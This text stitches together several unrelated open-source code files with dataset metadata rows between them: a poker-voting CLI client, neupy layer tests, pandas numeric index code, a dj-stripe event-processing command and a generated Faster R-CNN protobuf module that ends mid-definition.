'name': self.username
}
response = self.send_request(method='post',
route='/user/remove',
params=params_dict,
data=data_dict)
if response.status_code == status.HTTP_200_OK:
response_dict = json.loads(response.text)
print(f"{response_dict['result_message']}")
else:
self.print_error_response(response)
def do_reset_votes(self, inp):
"""
Reset votes on current issue
"""
crt_dict = {
'name': self.username
}
response = self.send_request(method='post',
route='/issue/votes_reset',
data=crt_dict)
if response.status_code == status.HTTP_200_OK:
response_dict = json.loads(response.text)
print(f"{response_dict['result_message']}")
else:
self.print_error_response(response)
def do_show_report(self, inp):
"""
Show vote report for current issue
"""
self.get_report(inp)
def do_user_count(self, inp):
"""
Show how many users are registered for the current game
"""
response = self.send_request(method='get',
route='/user/count')
if response.status_code == status.HTTP_200_OK:
response_dict = json.loads(response.text)
user_count = response_dict['result_message']['user_count']
if user_count == 1:
verb = 'is'
else:
verb = 'are'
print(f"Currently, there {verb} {user_count} registered "
f"players")
else:
self.print_error_response(response)
def do_vote_issue(self, vote_value):
"""
Vote on the current issue with the registered user here
"""
crt_dict = {
'name': self.username,
'vote_value': vote_value
}
response = self.send_request(method='put',
route='/issue/vote',
data=crt_dict)
if response.status_code == status.HTTP_200_OK:
response_dict = json.loads(response.text)
print(f"{response_dict['result_message']}")
else:
self.print_error_response(response)
def do_voting_system(self, inp):
"""
Show voting system for the current game
"""
response = self.send_request(method='get',
route='/game/voting_system')
if response.status_code == status.HTTP_200_OK:
response_dict = json.loads(response.text)
print(f"{response_dict['result_message']}")
else:
self.print_error_response(response)
do_EOF = do_exit
if __name__ == '__main__':
crt_config_params = {}
config_path = Path('./configs/cli_config.json')
parser = argparse.ArgumentParser()
parser.add_argument("-c", "--config", type=str,
help="Configuration file name")
args = parser.parse_args()
if args.config:
config_path = Path(args.config)
if config_path.exists():
with open(config_path) as f:
try:
crt_config_params = json.load(f)
except json.decoder.JSONDecodeError as je:
print(f"Please make sure config file contains a dict in json "
f"format. An example can be found in "
f"'./configs/cli_config.json'. {je} was raised.")
else:
print(f"Please make sure the path {config_path} is correct and that "
f"the file exists. Will use default configuration parameters "
f"this time.")
MyPrompt(**crt_config_params).cmdloop()
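# Usage sketch (not part of the original script; the script name below is
# illustrative): the client is started directly and can be pointed at a config
# file via the -c/--config flag defined above, e.g.
#
#   python poker_cli.py
#   python poker_cli.py --config ./configs/cli_config.json
#
# The JSON file must contain a single dict whose keys match MyPrompt's
# constructor keyword arguments (not shown in this excerpt); which keys those
# are is an assumption here, so check MyPrompt.__init__ before writing one.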
| 36.737662 | 80 | 0.548713 |
af2e9b756a7ec250aefdf90c42c7fddcfa3ad298
| 4,666 |
py
|
Python
|
tests/layers/test_merge_layers.py
|
vishalbelsare/neupy
|
684313cdaddcad326f2169384fb15ec3aa29d991
|
[
"MIT"
] | null | null | null |
tests/layers/test_merge_layers.py
|
vishalbelsare/neupy
|
684313cdaddcad326f2169384fb15ec3aa29d991
|
[
"MIT"
] | null | null | null |
tests/layers/test_merge_layers.py
|
vishalbelsare/neupy
|
684313cdaddcad326f2169384fb15ec3aa29d991
|
[
"MIT"
] | null | null | null |
import theano
import theano.tensor as T
import numpy as np
from neupy import layers, init
from neupy.utils import asfloat
from neupy.exceptions import LayerConnectionError
from base import BaseTestCase
class ElementwiseTestCase(BaseTestCase):
def test_elementwise_basic(self):
elem_layer = layers.Elementwise(merge_function=T.add)
x1 = T.matrix()
x2 = T.matrix()
y = theano.function([x1, x2], elem_layer.output(x1, x2))
x1_matrix = asfloat(np.random.random((10, 2)))
x2_matrix = asfloat(np.random.random((10, 2)))
expected_output = x1_matrix + x2_matrix
actual_output = y(x1_matrix, x2_matrix)
np.testing.assert_array_almost_equal(expected_output, actual_output)
def test_elementwise_initialize(self):
        # Should not fail if you initialize
        # it without a connection
elem_layer = layers.Elementwise()
elem_layer.initialize()
def test_elementwise_single_input(self):
elem_layer = layers.Elementwise()
output = elem_layer.output(None)
self.assertEqual(output, None)
def test_elementwise_init_error(self):
input_layer_1 = layers.Input(10)
input_layer_2 = layers.Input(20)
elem_layer = layers.Elementwise()
layers.join(input_layer_1, elem_layer)
with self.assertRaises(LayerConnectionError):
layers.join(input_layer_2, elem_layer)
def test_elementwise_not_function(self):
with self.assertRaises(ValueError):
not_callable_object = (1, 2, 3)
layers.Elementwise(merge_function=not_callable_object)
def test_elementwise_output_shape_no_connection(self):
elem_layer = layers.Elementwise()
self.assertEqual(elem_layer.output_shape, None)
def test_elementwise_in_connections(self):
input_layer = layers.Input(2)
hidden_layer_1 = layers.Relu(1, weight=init.Constant(1),
bias=init.Constant(0))
hidden_layer_2 = layers.Relu(1, weight=init.Constant(2),
bias=init.Constant(0))
elem_layer = layers.Elementwise(merge_function=T.add)
connection = layers.join(input_layer, hidden_layer_1, elem_layer)
connection = layers.join(input_layer, hidden_layer_2, elem_layer)
connection.initialize()
self.assertEqual(elem_layer.output_shape, (1,))
x = T.matrix()
y = theano.function([x], connection.output(x))
test_input = asfloat(np.array([
[0, 1],
[-1, -1],
]))
actual_output = y(test_input)
expected_output = np.array([
[3],
[0],
])
np.testing.assert_array_almost_equal(expected_output, actual_output)
class ConcatenateTestCase(BaseTestCase):
def test_concatenate_basic(self):
concat_layer = layers.Concatenate(axis=1)
x1 = T.tensor4()
x2 = T.tensor4()
y = theano.function([x1, x2], concat_layer.output(x1, x2))
x1_tensor4 = asfloat(np.random.random((1, 2, 3, 4)))
x2_tensor4 = asfloat(np.random.random((1, 8, 3, 4)))
output = y(x1_tensor4, x2_tensor4)
self.assertEqual((1, 10, 3, 4), output.shape)
def test_concatenate_init_error(self):
input_layer_1 = layers.Input((3, 28, 28))
input_layer_2 = layers.Input((1, 28, 28))
concat_layer = layers.Concatenate(axis=2)
layers.join(input_layer_1, concat_layer)
with self.assertRaises(LayerConnectionError):
layers.join(input_layer_2, concat_layer)
def test_concatenate_conv_layers(self):
input_layer = layers.Input((3, 28, 28))
hidden_layer_1 = layers.Convolution((7, 5, 5))
hidden_layer_21 = layers.Convolution((1, 3, 3))
hidden_layer_22 = layers.Convolution((4, 3, 3))
concat_layer = layers.Concatenate(axis=1)
connection = layers.join(input_layer, hidden_layer_1, concat_layer)
connection = layers.join(input_layer, hidden_layer_21,
hidden_layer_22, concat_layer)
connection.initialize()
self.assertEqual((11, 24, 24), concat_layer.output_shape)
x = T.tensor4()
y = theano.function([x], connection.output(x))
x_tensor4 = asfloat(np.random.random((5, 3, 28, 28)))
actual_output = y(x_tensor4)
self.assertEqual((5, 11, 24, 24), actual_output.shape)
def test_elementwise_concatenate(self):
        # Should not fail if you initialize
        # it without a connection
layer = layers.Concatenate()
layer.initialize()
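# Usage sketch (illustrative, mirroring test_elementwise_in_connections above):
# two branches that share one input are merged by joining both into the same
# merge layer before initializing the connection.
#
#   input_layer = layers.Input(2)
#   left = layers.Relu(1)
#   right = layers.Relu(1)
#   merged = layers.Elementwise(merge_function=T.add)
#   connection = layers.join(input_layer, left, merged)
#   connection = layers.join(input_layer, right, merged)
#   connection.initialize()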
| 34.562963 | 76 | 0.644664 |
08881f915ef2d23f3256e3e3ce81006be77c4780
| 14,126 |
py
|
Python
|
pandas/core/indexes/numeric.py
|
zeitlinv/pandas
|
08d296f1278e08b407448c95086589e1d10285f9
|
[
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | 2 |
2021-08-18T11:17:41.000Z
|
2021-08-18T11:17:53.000Z
|
pandas/core/indexes/numeric.py
|
zeitlinv/pandas
|
08d296f1278e08b407448c95086589e1d10285f9
|
[
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | 1 |
2021-08-30T15:10:57.000Z
|
2021-08-30T15:10:57.000Z
|
pandas/core/indexes/numeric.py
|
zeitlinv/pandas
|
08d296f1278e08b407448c95086589e1d10285f9
|
[
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | 1 |
2021-08-30T14:37:26.000Z
|
2021-08-30T14:37:26.000Z
|
from __future__ import annotations
from typing import (
Callable,
Hashable,
)
import warnings
import numpy as np
from pandas._libs import (
index as libindex,
lib,
)
from pandas._typing import (
Dtype,
DtypeObj,
)
from pandas.util._decorators import (
cache_readonly,
doc,
)
from pandas.core.dtypes.cast import astype_nansafe
from pandas.core.dtypes.common import (
is_dtype_equal,
is_extension_array_dtype,
is_float,
is_float_dtype,
is_integer_dtype,
is_numeric_dtype,
is_scalar,
is_signed_integer_dtype,
is_unsigned_integer_dtype,
needs_i8_conversion,
pandas_dtype,
)
from pandas.core.dtypes.generic import ABCSeries
from pandas.core.indexes.base import (
Index,
maybe_extract_name,
)
_num_index_shared_docs = {}
_num_index_shared_docs[
"class_descr"
] = """
Immutable sequence used for indexing and alignment. The basic object
storing axis labels for all pandas objects. %(klass)s is a special case
of `Index` with purely %(ltype)s labels. %(extra)s.
Parameters
----------
data : array-like (1-dimensional)
dtype : NumPy dtype (default: %(dtype)s)
copy : bool
Make a copy of input ndarray.
name : object
Name to be stored in the index.
Attributes
----------
None
Methods
-------
None
See Also
--------
Index : The base pandas Index type.
Notes
-----
An Index instance can **only** contain hashable objects.
"""
class NumericIndex(Index):
_index_descr_args = {
"klass": "NumericIndex",
"ltype": "integer or float",
"dtype": "inferred",
"extra": "",
}
__doc__ = _num_index_shared_docs["class_descr"] % _index_descr_args
_typ = "numericindex"
_values: np.ndarray
_default_dtype: np.dtype | None = None
_dtype_validation_metadata: tuple[Callable[..., bool], str] = (
is_numeric_dtype,
"numeric type",
)
_is_numeric_dtype = True
_can_hold_strings = False
_is_backward_compat_public_numeric_index: bool = True
@cache_readonly
def _can_hold_na(self) -> bool:
if is_float_dtype(self.dtype):
return True
else:
return False
_engine_types: dict[np.dtype, type[libindex.IndexEngine]] = {
np.dtype(np.int8): libindex.Int8Engine,
np.dtype(np.int16): libindex.Int16Engine,
np.dtype(np.int32): libindex.Int32Engine,
np.dtype(np.int64): libindex.Int64Engine,
np.dtype(np.uint8): libindex.UInt8Engine,
np.dtype(np.uint16): libindex.UInt16Engine,
np.dtype(np.uint32): libindex.UInt32Engine,
np.dtype(np.uint64): libindex.UInt64Engine,
np.dtype(np.float32): libindex.Float32Engine,
np.dtype(np.float64): libindex.Float64Engine,
}
@property
def _engine_type(self):
return self._engine_types[self.dtype]
@cache_readonly
def inferred_type(self) -> str:
return {
"i": "integer",
"u": "integer",
"f": "floating",
}[self.dtype.kind]
def __new__(cls, data=None, dtype: Dtype | None = None, copy=False, name=None):
name = maybe_extract_name(name, data, cls)
subarr = cls._ensure_array(data, dtype, copy)
return cls._simple_new(subarr, name=name)
@classmethod
def _ensure_array(cls, data, dtype, copy: bool):
"""
Ensure we have a valid array to pass to _simple_new.
"""
cls._validate_dtype(dtype)
if not isinstance(data, (np.ndarray, Index)):
# Coerce to ndarray if not already ndarray or Index
if is_scalar(data):
raise cls._scalar_data_error(data)
# other iterable of some kind
if not isinstance(data, (ABCSeries, list, tuple)):
data = list(data)
orig = data
data = np.asarray(data, dtype=dtype)
if dtype is None and data.dtype.kind == "f":
if cls is UInt64Index and (data >= 0).all():
# https://github.com/numpy/numpy/issues/19146
data = np.asarray(orig, dtype=np.uint64)
if issubclass(data.dtype.type, str):
cls._string_data_error(data)
dtype = cls._ensure_dtype(dtype)
if copy or not is_dtype_equal(data.dtype, dtype):
# TODO: the try/except below is because it's difficult to predict the error
# and/or error message from different combinations of data and dtype.
# Efforts to avoid this try/except welcome.
# See https://github.com/pandas-dev/pandas/pull/41153#discussion_r676206222
try:
subarr = np.array(data, dtype=dtype, copy=copy)
cls._validate_dtype(subarr.dtype)
except (TypeError, ValueError):
raise ValueError(f"data is not compatible with {cls.__name__}")
cls._assert_safe_casting(data, subarr)
else:
subarr = data
if subarr.ndim > 1:
# GH#13601, GH#20285, GH#27125
raise ValueError("Index data must be 1-dimensional")
subarr = np.asarray(subarr)
return subarr
@classmethod
def _validate_dtype(cls, dtype: Dtype | None) -> None:
if dtype is None:
return
validation_func, expected = cls._dtype_validation_metadata
if not validation_func(dtype):
raise ValueError(
f"Incorrect `dtype` passed: expected {expected}, received {dtype}"
)
@classmethod
def _ensure_dtype(cls, dtype: Dtype | None) -> np.dtype | None:
"""
Ensure int64 dtype for Int64Index etc. but allow int32 etc. for NumericIndex.
Assumes dtype has already been validated.
"""
if dtype is None:
return cls._default_dtype
dtype = pandas_dtype(dtype)
assert isinstance(dtype, np.dtype)
if cls._is_backward_compat_public_numeric_index:
# dtype for NumericIndex
return dtype
else:
# dtype for Int64Index, UInt64Index etc. Needed for backwards compat.
return cls._default_dtype
def __contains__(self, key) -> bool:
"""
Check if key is a float and has a decimal. If it has, return False.
"""
if not is_integer_dtype(self.dtype):
return super().__contains__(key)
hash(key)
try:
if is_float(key) and int(key) != key:
# otherwise the `key in self._engine` check casts e.g. 1.1 -> 1
return False
return key in self._engine
except (OverflowError, TypeError, ValueError):
return False
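    # Example (illustrative): for an integer-dtype index containing 1,
    # `1 in idx` and `1.0 in idx` are True, while `1.5 in idx` is False
    # because 1.5 cannot be represented by the integer labels.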
@doc(Index.astype)
def astype(self, dtype, copy=True):
dtype = pandas_dtype(dtype)
if is_float_dtype(self.dtype):
if needs_i8_conversion(dtype):
raise TypeError(
f"Cannot convert Float64Index to dtype {dtype}; integer "
"values are required for conversion"
)
elif is_integer_dtype(dtype) and not is_extension_array_dtype(dtype):
# TODO(jreback); this can change once we have an EA Index type
# GH 13149
arr = astype_nansafe(self._values, dtype=dtype)
if isinstance(self, Float64Index):
return Int64Index(arr, name=self.name)
else:
return NumericIndex(arr, name=self.name, dtype=dtype)
elif self._is_backward_compat_public_numeric_index:
# this block is needed so e.g. NumericIndex[int8].astype("int32") returns
# NumericIndex[int32] and not Int64Index with dtype int64.
            # When Int64Index etc. are removed from the code base, remove this also.
if not is_extension_array_dtype(dtype) and is_numeric_dtype(dtype):
return self._constructor(self, dtype=dtype, copy=copy)
return super().astype(dtype, copy=copy)
# ----------------------------------------------------------------
# Indexing Methods
@cache_readonly
@doc(Index._should_fallback_to_positional)
def _should_fallback_to_positional(self) -> bool:
return False
@doc(Index._convert_slice_indexer)
def _convert_slice_indexer(self, key: slice, kind: str):
if is_float_dtype(self.dtype):
assert kind in ["loc", "getitem"]
# We always treat __getitem__ slicing as label-based
# translate to locations
return self.slice_indexer(key.start, key.stop, key.step)
return super()._convert_slice_indexer(key, kind=kind)
@doc(Index._maybe_cast_slice_bound)
def _maybe_cast_slice_bound(self, label, side: str, kind=lib.no_default):
assert kind in ["loc", "getitem", None, lib.no_default]
self._deprecated_arg(kind, "kind", "_maybe_cast_slice_bound")
# we will try to coerce to integers
return self._maybe_cast_indexer(label)
# ----------------------------------------------------------------
@doc(Index._shallow_copy)
def _shallow_copy(self, values, name: Hashable = lib.no_default):
if not self._can_hold_na and values.dtype.kind == "f":
name = self._name if name is lib.no_default else name
# Ensure we are not returning an Int64Index with float data:
return Float64Index._simple_new(values, name=name)
return super()._shallow_copy(values=values, name=name)
def _convert_tolerance(self, tolerance, target):
tolerance = super()._convert_tolerance(tolerance, target)
if not np.issubdtype(tolerance.dtype, np.number):
if tolerance.ndim > 0:
raise ValueError(
f"tolerance argument for {type(self).__name__} must contain "
"numeric elements if it is list type"
)
else:
raise ValueError(
f"tolerance argument for {type(self).__name__} must be numeric "
f"if it is a scalar: {repr(tolerance)}"
)
return tolerance
def _is_comparable_dtype(self, dtype: DtypeObj) -> bool:
# If we ever have BoolIndex or ComplexIndex, this may need to be tightened
return is_numeric_dtype(dtype)
@classmethod
def _assert_safe_casting(cls, data: np.ndarray, subarr: np.ndarray) -> None:
"""
Ensure incoming data can be represented with matching signed-ness.
Needed if the process of casting data from some accepted dtype to the internal
dtype(s) bears the risk of truncation (e.g. float to int).
"""
if is_integer_dtype(subarr.dtype):
if not np.array_equal(data, subarr):
raise TypeError("Unsafe NumPy casting, you must explicitly cast")
@property
def _is_all_dates(self) -> bool:
"""
Checks that all the labels are datetime objects.
"""
return False
def _format_native_types(
self, na_rep="", float_format=None, decimal=".", quoting=None, **kwargs
):
from pandas.io.formats.format import FloatArrayFormatter
if is_float_dtype(self.dtype):
formatter = FloatArrayFormatter(
self._values,
na_rep=na_rep,
float_format=float_format,
decimal=decimal,
quoting=quoting,
fixed_width=False,
)
return formatter.get_result_as_array()
return super()._format_native_types(
na_rep=na_rep,
float_format=float_format,
decimal=decimal,
quoting=quoting,
**kwargs,
)
class IntegerIndex(NumericIndex):
"""
This is an abstract class for Int64Index, UInt64Index.
"""
_is_backward_compat_public_numeric_index: bool = False
@property
def asi8(self) -> np.ndarray:
# do not cache or you'll create a memory leak
warnings.warn(
"Index.asi8 is deprecated and will be removed in a future version",
FutureWarning,
stacklevel=2,
)
return self._values.view(self._default_dtype)
class Int64Index(IntegerIndex):
_index_descr_args = {
"klass": "Int64Index",
"ltype": "integer",
"dtype": "int64",
"extra": "",
}
__doc__ = _num_index_shared_docs["class_descr"] % _index_descr_args
_typ = "int64index"
_engine_type = libindex.Int64Engine
_default_dtype = np.dtype(np.int64)
_dtype_validation_metadata = (is_signed_integer_dtype, "signed integer")
class UInt64Index(IntegerIndex):
_index_descr_args = {
"klass": "UInt64Index",
"ltype": "unsigned integer",
"dtype": "uint64",
"extra": "",
}
__doc__ = _num_index_shared_docs["class_descr"] % _index_descr_args
_typ = "uint64index"
_engine_type = libindex.UInt64Engine
_default_dtype = np.dtype(np.uint64)
_dtype_validation_metadata = (is_unsigned_integer_dtype, "unsigned integer")
def _validate_fill_value(self, value):
# e.g. np.array([1]) we want np.array([1], dtype=np.uint64)
# see test_where_uin64
super()._validate_fill_value(value)
if hasattr(value, "dtype") and is_signed_integer_dtype(value.dtype):
if (value >= 0).all():
return value.astype(self.dtype)
raise TypeError
return value
class Float64Index(NumericIndex):
_index_descr_args = {
"klass": "Float64Index",
"dtype": "float64",
"ltype": "float",
"extra": "",
}
__doc__ = _num_index_shared_docs["class_descr"] % _index_descr_args
_typ = "float64index"
_engine_type = libindex.Float64Engine
_default_dtype = np.dtype(np.float64)
_dtype_validation_metadata = (is_float_dtype, "float")
_is_backward_compat_public_numeric_index: bool = False
| 32.473563 | 87 | 0.609514 |
fecb699e11482b5370595411b7fe70f921e358b4
| 339 |
py
|
Python
|
packages/PIPS/validation/Terapix/alphablending.py
|
DVSR1966/par4all
|
86b33ca9da736e832b568c5637a2381f360f1996
|
[
"MIT"
] | 51 |
2015-01-31T01:51:39.000Z
|
2022-02-18T02:01:50.000Z
|
packages/PIPS/validation/Terapix/alphablending.py
|
DVSR1966/par4all
|
86b33ca9da736e832b568c5637a2381f360f1996
|
[
"MIT"
] | 7 |
2017-05-29T09:29:00.000Z
|
2019-03-11T16:01:39.000Z
|
packages/PIPS/validation/Terapix/alphablending.py
|
DVSR1966/par4all
|
86b33ca9da736e832b568c5637a2381f360f1996
|
[
"MIT"
] | 12 |
2015-03-26T08:05:38.000Z
|
2022-02-18T02:01:51.000Z
|
from __future__ import with_statement # this is to work with python2.5
import terapyps
from pyps import workspace
workspace.delete("alphablending")
with terapyps.workspace("alphablending.c", name="alphablending", deleteOnClose=False) as w:
for f in w.fun:
f.terapix_code_generation(debug=True)
# w.compile(terapyps.Maker())
| 37.666667 | 91 | 0.766962 |
dd2cf44203c6b4a0c3d6a9e9e5ac39716d3a1aaf
| 4,258 |
py
|
Python
|
djstripe/management/commands/djstripe_process_events.py
|
omidraha/dj-stripe
|
5785513e88de7e4648e52723d219ed82ce82cfe2
|
[
"MIT"
] | null | null | null |
djstripe/management/commands/djstripe_process_events.py
|
omidraha/dj-stripe
|
5785513e88de7e4648e52723d219ed82ce82cfe2
|
[
"MIT"
] | null | null | null |
djstripe/management/commands/djstripe_process_events.py
|
omidraha/dj-stripe
|
5785513e88de7e4648e52723d219ed82ce82cfe2
|
[
"MIT"
] | null | null | null |
from django.core.management.base import BaseCommand
from ... import models
from ...mixins import VerbosityAwareOutputMixin
from ...settings import djstripe_settings
class Command(VerbosityAwareOutputMixin, BaseCommand):
"""Command to process all Events.
Optional arguments are provided to limit the number of Events processed.
    Note: this is only guaranteed to go back at most 30 days based on the
current limitation of stripe's events API. See: https://stripe.com/docs/api/events
"""
help = (
"Process all Events. Use optional arguments to limit the Events to process. "
"Note: this is only guaranteed go back at most 30 days based on the current "
"limitation of stripe's events API. See: https://stripe.com/docs/api/events"
)
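    # Usage sketch (illustrative; assumes this file is installed as a Django
    # management command, so the command name matches the module name):
    #
    #   python manage.py djstripe_process_events
    #   python manage.py djstripe_process_events --failed
    #   python manage.py djstripe_process_events --type "invoice.*"
    #   python manage.py djstripe_process_events --ids evt_123 evt_456
    #
    # The event IDs above are placeholders. The three filter options are
    # mutually exclusive (see add_arguments below).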
def add_arguments(self, parser):
"""Add optional arugments to filter Events by."""
# Use a mutually exclusive group to prevent multiple arguments being
# specified together.
group = parser.add_mutually_exclusive_group()
group.add_argument(
"--ids",
nargs="*",
help="An optional space separated list of specific Event IDs to sync.",
)
group.add_argument(
"--failed",
action="store_true",
help="Syncs and processes only the events that have failed webhooks.",
)
group.add_argument(
"--type",
help=(
"A string containing a specific event name,"
" or group of events using * as a wildcard."
" The list will be filtered to include only"
" events with a matching event property."
),
)
def handle(self, *args, **options):
"""Try to process Events listed from the API."""
# Set the verbosity to determine how much we output, if at all.
self.set_verbosity(options)
event_ids = options["ids"]
failed = options["failed"]
type_filter = options["type"]
# Args are mutually exclusive,
# so output what we are doing based on that assumption.
if failed:
self.output("Processing all failed events")
elif type_filter:
self.output(
"Processing all events that match {filter}".format(filter=type_filter)
)
elif event_ids:
self.output("Processing specific events {events}".format(events=event_ids))
else:
self.output("Processing all available events")
# Either use the specific event IDs to retrieve data, or use the api_list
# if no specific event IDs are specified.
if event_ids:
listed_events = (
models.Event.stripe_class.retrieve(
id=event_id, api_key=djstripe_settings.STRIPE_SECRET_KEY
)
for event_id in event_ids
)
else:
list_kwargs = {}
if failed:
list_kwargs["delivery_success"] = False
if type_filter:
list_kwargs["type"] = type_filter
listed_events = models.Event.api_list(**list_kwargs)
self.process_events(listed_events)
def process_events(self, listed_events):
# Process each listed event. Capture failures and continue,
# outputting debug information as verbosity dictates.
count = 0
total = 0
for event_data in listed_events:
try:
total += 1
event = models.Event.process(data=event_data)
count += 1
self.verbose_output(" Synced Event {id}".format(id=event.id))
except Exception as exception:
self.verbose_output(
" Failed processing Event {id}".format(id=event_data["id"])
)
self.output(" {exception}".format(exception=exception))
self.verbose_traceback()
if total == 0:
self.output(" (no results)")
else:
self.output(
" Processed {count} out of {total} Events".format(
count=count, total=total
)
)
| 36.393162 | 87 | 0.581259 |
995d2e612ca2ece917f6f767aab82e839eaf62a0
| 24,448 |
py
|
Python
|
research/object_detection/protos/faster_rcnn_pb2.py
|
janzkyle23/models
|
a8ae09e23d309f8893619387a7133bcc4db3d8a9
|
[
"Apache-2.0"
] | 5 |
2020-01-22T15:53:06.000Z
|
2021-10-05T02:45:26.000Z
|
research/object_detection/protos/faster_rcnn_pb2.py
|
janzkyle23/models
|
a8ae09e23d309f8893619387a7133bcc4db3d8a9
|
[
"Apache-2.0"
] | 6 |
2020-06-08T14:35:41.000Z
|
2022-02-10T01:52:40.000Z
|
research/object_detection/protos/faster_rcnn_pb2.py
|
janzkyle23/models
|
a8ae09e23d309f8893619387a7133bcc4db3d8a9
|
[
"Apache-2.0"
] | 7 |
2020-03-30T12:22:11.000Z
|
2021-09-18T14:06:22.000Z
|
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: object_detection/protos/faster_rcnn.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from object_detection.protos import anchor_generator_pb2 as object__detection_dot_protos_dot_anchor__generator__pb2
from object_detection.protos import box_predictor_pb2 as object__detection_dot_protos_dot_box__predictor__pb2
from object_detection.protos import hyperparams_pb2 as object__detection_dot_protos_dot_hyperparams__pb2
from object_detection.protos import image_resizer_pb2 as object__detection_dot_protos_dot_image__resizer__pb2
from object_detection.protos import losses_pb2 as object__detection_dot_protos_dot_losses__pb2
from object_detection.protos import post_processing_pb2 as object__detection_dot_protos_dot_post__processing__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='object_detection/protos/faster_rcnn.proto',
package='object_detection.protos',
syntax='proto2',
serialized_pb=_b('\n)object_detection/protos/faster_rcnn.proto\x12\x17object_detection.protos\x1a.object_detection/protos/anchor_generator.proto\x1a+object_detection/protos/box_predictor.proto\x1a)object_detection/protos/hyperparams.proto\x1a+object_detection/protos/image_resizer.proto\x1a$object_detection/protos/losses.proto\x1a-object_detection/protos/post_processing.proto\"\x85\x0f\n\nFasterRcnn\x12\x1b\n\x10number_of_stages\x18\x01 \x01(\x05:\x01\x32\x12\x13\n\x0bnum_classes\x18\x03 \x01(\x05\x12<\n\rimage_resizer\x18\x04 \x01(\x0b\x32%.object_detection.protos.ImageResizer\x12N\n\x11\x66\x65\x61ture_extractor\x18\x05 \x01(\x0b\x32\x33.object_detection.protos.FasterRcnnFeatureExtractor\x12N\n\x1c\x66irst_stage_anchor_generator\x18\x06 \x01(\x0b\x32(.object_detection.protos.AnchorGenerator\x12\"\n\x17\x66irst_stage_atrous_rate\x18\x07 \x01(\x05:\x01\x31\x12X\n*first_stage_box_predictor_conv_hyperparams\x18\x08 \x01(\x0b\x32$.object_detection.protos.Hyperparams\x12\x30\n%first_stage_box_predictor_kernel_size\x18\t \x01(\x05:\x01\x33\x12,\n\x1f\x66irst_stage_box_predictor_depth\x18\n \x01(\x05:\x03\x35\x31\x32\x12\'\n\x1a\x66irst_stage_minibatch_size\x18\x0b \x01(\x05:\x03\x32\x35\x36\x12\x32\n%first_stage_positive_balance_fraction\x18\x0c \x01(\x02:\x03\x30.5\x12*\n\x1f\x66irst_stage_nms_score_threshold\x18\r \x01(\x02:\x01\x30\x12*\n\x1d\x66irst_stage_nms_iou_threshold\x18\x0e \x01(\x02:\x03\x30.7\x12&\n\x19\x66irst_stage_max_proposals\x18\x0f \x01(\x05:\x03\x33\x30\x30\x12/\n$first_stage_localization_loss_weight\x18\x10 \x01(\x02:\x01\x31\x12-\n\"first_stage_objectness_loss_weight\x18\x11 \x01(\x02:\x01\x31\x12\x19\n\x11initial_crop_size\x18\x12 \x01(\x05\x12\x1b\n\x13maxpool_kernel_size\x18\x13 \x01(\x05\x12\x16\n\x0emaxpool_stride\x18\x14 \x01(\x05\x12I\n\x1asecond_stage_box_predictor\x18\x15 \x01(\x0b\x32%.object_detection.protos.BoxPredictor\x12#\n\x17second_stage_batch_size\x18\x16 \x01(\x05:\x02\x36\x34\x12+\n\x1dsecond_stage_balance_fraction\x18\x17 \x01(\x02:\x04\x30.25\x12M\n\x1csecond_stage_post_processing\x18\x18 \x01(\x0b\x32\'.object_detection.protos.PostProcessing\x12\x30\n%second_stage_localization_loss_weight\x18\x19 \x01(\x02:\x01\x31\x12\x32\n\'second_stage_classification_loss_weight\x18\x1a \x01(\x02:\x01\x31\x12\x33\n(second_stage_mask_prediction_loss_weight\x18\x1b \x01(\x02:\x01\x31\x12\x45\n\x12hard_example_miner\x18\x1c \x01(\x0b\x32).object_detection.protos.HardExampleMiner\x12U\n second_stage_classification_loss\x18\x1d \x01(\x0b\x32+.object_detection.protos.ClassificationLoss\x12\'\n\x18inplace_batchnorm_update\x18\x1e \x01(\x08:\x05\x66\x61lse\x12)\n\x1ause_matmul_crop_and_resize\x18\x1f \x01(\x08:\x05\x66\x61lse\x12$\n\x15\x63lip_anchors_to_image\x18 \x01(\x08:\x05\x66\x61lse\x12+\n\x1cuse_matmul_gather_in_matcher\x18! \x01(\x08:\x05\x66\x61lse\x12\x30\n!use_static_balanced_label_sampler\x18\" \x01(\x08:\x05\x66\x61lse\x12 \n\x11use_static_shapes\x18# \x01(\x08:\x05\x66\x61lse\x12\x1a\n\x0cresize_masks\x18$ \x01(\x08:\x04true\x12)\n\x1ause_static_shapes_for_eval\x18% \x01(\x08:\x05\x66\x61lse\x12\x30\n\"use_partitioned_nms_in_first_stage\x18& \x01(\x08:\x04true\x12\x33\n$return_raw_detections_during_predict\x18\' \x01(\x08:\x05\x66\x61lse\x12.\n\x1fuse_combined_nms_in_first_stage\x18( \x01(\x08:\x05\x66\x61lse\"x\n\x1a\x46\x61sterRcnnFeatureExtractor\x12\x0c\n\x04type\x18\x01 \x01(\t\x12\'\n\x1b\x66irst_stage_features_stride\x18\x02 \x01(\x05:\x02\x31\x36\x12#\n\x14\x62\x61tch_norm_trainable\x18\x03 \x01(\x08:\x05\x66\x61lse')
,
dependencies=[object__detection_dot_protos_dot_anchor__generator__pb2.DESCRIPTOR,object__detection_dot_protos_dot_box__predictor__pb2.DESCRIPTOR,object__detection_dot_protos_dot_hyperparams__pb2.DESCRIPTOR,object__detection_dot_protos_dot_image__resizer__pb2.DESCRIPTOR,object__detection_dot_protos_dot_losses__pb2.DESCRIPTOR,object__detection_dot_protos_dot_post__processing__pb2.DESCRIPTOR,])
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
_FASTERRCNN = _descriptor.Descriptor(
name='FasterRcnn',
full_name='object_detection.protos.FasterRcnn',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='number_of_stages', full_name='object_detection.protos.FasterRcnn.number_of_stages', index=0,
number=1, type=5, cpp_type=1, label=1,
